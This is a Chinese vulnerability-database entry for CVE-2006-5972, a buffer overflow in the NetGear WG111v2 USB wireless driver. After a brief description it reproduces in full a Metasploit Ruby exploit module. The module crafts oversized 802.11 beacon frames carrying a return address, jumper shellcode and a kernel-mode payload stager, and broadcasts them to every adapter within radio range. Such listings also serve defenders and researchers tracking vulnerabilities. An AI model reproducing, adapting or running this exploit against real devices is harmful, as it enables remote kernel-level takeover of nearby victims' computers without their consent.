NetGear WG111v2 Wireless Driver Long Beacon缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1119606 漏洞类型 缓冲区溢出
发布时间 2010-07-03 更新时间 2010-07-03
CVE编号 CVE-2006-5972 CNNVD-ID CNNVD-200611-293
漏洞平台 Hardware CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/16388
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200611-293
|漏洞详情
NetGearWG111v2wirelessadapter(USB)中的WG111v2.SYS存在栈缓冲区溢出,远程攻击者可以通过一个长的802.11信标请求来执行任意代码。
|漏洞EXP
##
# $Id: netgear_wg111_beacon.rb 9669 2010-07-03 03:13:45Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = LowRanking

	include Msf::Exploit::Lorcon2
	include Msf::Exploit::KernelMode

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'NetGear WG111v2 Wireless Driver Long Beacon Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in the NetGear WG111v2 wireless
				device driver. This stack buffer overflow allows remote code execution in kernel mode.
				The stack buffer overflow is triggered when a 802.11 Beacon frame is received that
				contains more than 1100 bytes worth of information elements.

				This exploit was tested with version 5.1213.6.316 of the WG111v2.SYS driver and
				a NetGear WG111v2 USB adapter. Since this vulnerability is exploited via beacon frames,
				all cards within range of the attack will be affected. The tested adapter used
				a MAC address in the range of 00:18:4d:02:XX:XX.

				Vulnerable clients will need to have their card in a non-associated state
				for this exploit to work. The easiest way to reproduce this bug is by starting
				the exploit and then unplugging and reinserting the USB card. The exploit can
				take up to a minute to execute the payload, depending on system activity.

				NetGear was NOT contacted about this flaw. A search of the SecurityFocus
				database indicates that NetGear has not provided an official patch or
				solution for any of the thirty flaws listed at the time of writing. This list
				includes BIDs: 1010, 3876, 4024, 4111, 5036, 5667, 5830, 5943, 5940, 6807, 7267, 7270,
				7371, 7367, 9194, 10404, 10459, 10585, 10935, 11580, 11634, 12447, 15816, 16837,
				16835, 19468, and 19973.

				This module depends on the Lorcon2 library and only works on the Linux platform
				with a supported wireless card. Please see the Ruby Lorcon2 documentation
				(external/ruby-lorcon/README) for more information.
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9669 $',
			'References'     =>
				[
					['CVE', '2006-5972'],
					['OSVDB', '30473'],
					['URL', 'http://projects.info-pull.com/mokb/MOKB-16-11-2006.html'],
				],
			'Privileged'     => true,

			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					# Its a beautiful day in the neighborhood...
					'Space'  => 1000,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					# Windows XP SP2 with the latest updates
					# 5.1.2600.2622 (xpsp_sp2_gdr.050301-1519)
					[ 'Windows XP SP2 (5.1.2600.2122), WG111v2.SYS 5.1213.6.316',
						{
							'Ret'      => 0x80502d7f, # jmp esp
							'Platform' => 'win',
							'Payload'  =>
							{
								'ExtendedOptions' =>
								{
									'Stager'       => 'sud_syscall_hook',
									'PrependUser'  => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
									'Recovery'     => 'idlethread_restart',
									'KiIdleLoopAddress' => 0x804dbb27,
								}
							}
						}
					],

					# Windows XP SP2 install media, no patches
					# 5.1.2600.2180 (xpsp_sp2_rtm_040803-2158)
					[ 'Windows XP SP2 (5.1.2600.2180), WG111v2.SYS 5.1213.6.316',
						{
							'Ret'      => 0x804ed5cb, # jmp esp
							'Platform' => 'win',
							'Payload'  =>
							{
								'ExtendedOptions' =>
								{
									'Stager'       => 'sud_syscall_hook',
									'PrependUser'  => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
									'Recovery'     => 'idlethread_restart',
									'KiIdleLoopAddress' => 0x804dc0c7,
								}
							}
						}
					]
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Nov 16 2006'))

		register_options(
			[
				OptString.new('ADDR_DST', [ true,  "The MAC address to send this to",'FF:FF:FF:FF:FF:FF']),
				OptInt.new('RUNTIME', [ true,  "The number of seconds to run the attack", 60])
			], self.class)
	end

	def exploit
		open_wifi

		stime = Time.now.to_i
		rtime = datastore['RUNTIME'].to_i
		count = 0

		print_status("Sending exploit beacons for #{datastore['RUNTIME']} seconds...")
		while (stime + rtime > Time.now.to_i)
			wifi.write(create_beacon)
			select(nil, nil, nil, 0.10) if (count % 100 == 0)

			count += 1

			# Exit if we get a session
			break if session_created?
		end

		print_status("Completed sending beacons.")
	end

	# Convert arbitrary data into a series of information elements
	def ie_padding(data)
		ret = 0
		idx = 0
		len = 0

		while(idx < data.length)
			len = data[idx+1]
			if (! len)
				data << "\x00"
				len = 0
			end

			idx += len + 2
		end

		data << yield(idx - data.length)
	end

	def create_beacon

		ssid   = rand_text_alphanumeric(16)
		bssid  = ("\x00" * 2) + rand_text(4)
		src    = ("\x00" * 2) + rand_text(4)
		seq    = [rand(255)].pack('n')
		stamp  = rand_text(8)

		frame =
			"\x80" +                      # type/subtype
			"\x00" +                      # flags
			"\x00\x00" +                  # duration
			eton(datastore['ADDR_DST']) + # dst
			src +                         # src
			bssid +                       # bssid
			seq   +                       # seq
			stamp +                       # timestamp value
			"\x64\x00" +                  # beacon interval
			rand_text(2) +      # capability flags

			# ssid tag
			"\x00" + ssid.length.chr + ssid +

			# supported rates
			"\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" +

			# current channel
			"\x03" + "\x01" + channel.chr

		# Bounce through EDI to the uncorrupted payload
		jumper =
			"\x6a\x39" + # push byte +0x39
			"\x58"     + # pop eax
			"\x01\xc7" + # add edi, eax
			"\xff\xe7"   # jmp edi

		# Overwrite enough to pop the return
		buf = rand_text(1160)

		# Kernel-mode stager fun goes here
		buf[0, payload.encoded.length] = payload.encoded

		# Return address is a jmp ESP
		buf[1101, 4] = [ target.ret ].pack('V')

		# Jump back to EDI + 0x39
		buf[1113, jumper.length] = jumper

		# Pad it out to be a valid set of IEs
		frame << ie_padding(buf) {|c| rand_text(c) }

		return frame
	end

end
|参考资料

来源:VU#445753
名称:VU#445753
链接:http://www.kb.cert.org/vuls/id/445753
来源:BID
名称:21126
链接:http://www.securityfocus.com/bid/21126
来源:VUPEN
名称:ADV-2006-4560
链接:http://www.frsirt.com/english/advisories/2006/4560
来源:SECUNIA
名称:22962
链接:http://secunia.com/advisories/22962
来源:MISC
链接:http://projects.info-pull.com/mokb/MOKB-16-11-2006.html
来源:XF
名称:netgear-wg111v2-bo(30370)
链接:http://xforce.iss.net/xforce/xfdb/30370
来源:SECTRACK
名称:1017245
链接:http://securitytracker.com/id?1017245